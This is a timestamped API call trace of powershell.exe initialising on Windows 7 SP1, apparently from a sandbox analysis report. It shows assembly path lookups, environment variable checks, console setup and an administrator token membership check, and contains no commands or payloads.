	[0525.497] CoTaskMemFree (pv=0x2914e0) 
	[0527.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0527.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0527.278] CoTaskMemAlloc (cb=0x104) returned 0x2914e0
	[0527.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2914e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.278] CoTaskMemFree (pv=0x2914e0) 
	[0527.280] CoTaskMemAlloc (cb=0x104) returned 0x2914e0
	[0527.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2914e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.280] CoTaskMemFree (pv=0x2914e0) 
	[0528.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0528.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0534.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0534.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0534.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0534.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0537.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0537.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0540.254] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0540.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.255] CoTaskMemFree (pv=0x291700) 
	[0540.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0540.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0540.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0542.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0542.186] SetErrorMode (uMode=0x1) returned 0x1
	[0542.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcda40 | out: lpFileInformation=0xcda40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0542.186] SetErrorMode (uMode=0x1) returned 0x1
	[0545.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.200] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0545.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.200] CoTaskMemFree (pv=0x291700) 
	[0545.203] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0545.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.203] CoTaskMemFree (pv=0x291700) 
	[0545.204] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0545.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.204] CoTaskMemFree (pv=0x291700) 
	[0545.207] CoCreateGuid (in: pguid=0xcde08 | out: pguid=0xcde08*(Data1=0x95acd4c2, Data2=0x8a93, Data3=0x4ce5, Data4=([0]=0xb8, [1]=0x5d, [2]=0x5f, [3]=0x0, [4]=0x56, [5]=0x46, [6]=0x9e, [7]=0xc4))) returned 0x0
	[0546.148] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0546.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.148] CoTaskMemFree (pv=0x291700) 
	[0546.151] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0546.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.151] CoTaskMemFree (pv=0x291700) 
	[0546.154] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0546.154] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.154] CoTaskMemFree (pv=0x291700) 
	[0546.162] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0546.164] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcdab0 | out: lpConsoleScreenBufferInfo=0xcdab0) returned 1
	[0546.171] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0546.172] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcdab0 | out: lpConsoleScreenBufferInfo=0xcdab0) returned 1
	[0546.173] GetVersionExW (in: lpVersionInformation=0xcda40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcda40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0546.176] GetCurrentProcess () returned 0xffffffffffffffff
	[0546.177] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcdad8 | out: TokenHandle=0xcdad8*=0x328) returned 1
	[0546.181] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd9f8 | out: TokenInformation=0x0, ReturnLength=0xcd9f8) returned 0
	[0546.183] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x297360
	[0546.183] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x297360, TokenInformationLength=0x4, ReturnLength=0xcd9f8 | out: TokenInformation=0x297360, ReturnLength=0xcd9f8) returned 1
	[0546.184] DuplicateTokenEx (in: hExistingToken=0x328, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcdb58 | out: phNewToken=0xcdb58*=0x2ec) returned 1
	[0546.184] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd9f8 | out: TokenInformation=0x0, ReturnLength=0xcd9f8) returned 0
	[0546.185] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x297310
	[0546.185] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x297310, TokenInformationLength=0x4, ReturnLength=0xcd9f8 | out: TokenInformation=0x297310, ReturnLength=0xcd9f8) returned 1
	[0546.186] CheckTokenMembership (in: TokenHandle=0x2ec, SidToCheck=0x2f16220*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcdb68 | out: IsMember=0xcdb68) returned 1
	[0546.186] CloseHandle (hObject=0x2ec) returned 1
	[0546.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0547.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0547.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0547.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0547.009] CoTaskMemAlloc (cb=0x804) returned 0x34f740
	[0547.009] GetConsoleTitleW (in: lpConsoleTitle=0x34f740, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0547.875] CoTaskMemFree (pv=0x34f740) 
	[0548.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0548.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0548.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0548.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0548.872] SetConsoleCtrlHandler (HandlerRoutine=0x2b968dc, Add=1) returned 1
	[0549.900] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0549.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.900] CoTaskMemFree (pv=0x291700) 
	[0549.914] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0549.916] CoCreateGuid (in: pguid=0xcdc50 | out: pguid=0xcdc50*(Data1=0x3db0e3d, Data2=0x55b6, Data3=0x43cb, Data4=([0]=0xa6, [1]=0x2e, [2]=0x79, [3]=0xb7, [4]=0x75, [5]=0x6f, [6]=0x42, [7]=0xf8))) returned 0x0
	[0549.918] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0549.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.918] CoTaskMemFree (pv=0x291700) 
	[0549.978] WinSqmIsOptedIn () returned 0x0
	[0549.979] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0549.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.979] CoTaskMemFree (pv=0x291700) 
	[0549.980] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0549.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.980] CoTaskMemFree (pv=0x291700) 
	[0549.980] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0549.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.980] CoTaskMemFree (pv=0x291700) 
	[0551.504] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0551.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.504] CoTaskMemFree (pv=0x291700) 
	[0551.505] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0551.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.505] CoTaskMemFree (pv=0x291700) 
	[0551.506] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0551.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.506] CoTaskMemFree (pv=0x291700) 
	[0551.507] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0551.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.507] CoTaskMemFree (pv=0x291700) 
	[0551.507] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0551.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.507] CoTaskMemFree (pv=0x291700) 
	[0551.510] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0551.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.510] CoTaskMemFree (pv=0x291700) 
	[0551.514] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0551.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.514] CoTaskMemFree (pv=0x291700) 
	[0551.515] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0551.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.515] CoTaskMemFree (pv=0x291700) 
	[0551.515] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0551.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0551.516] CoTaskMemFree (pv=0x291700) 
	[0561.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
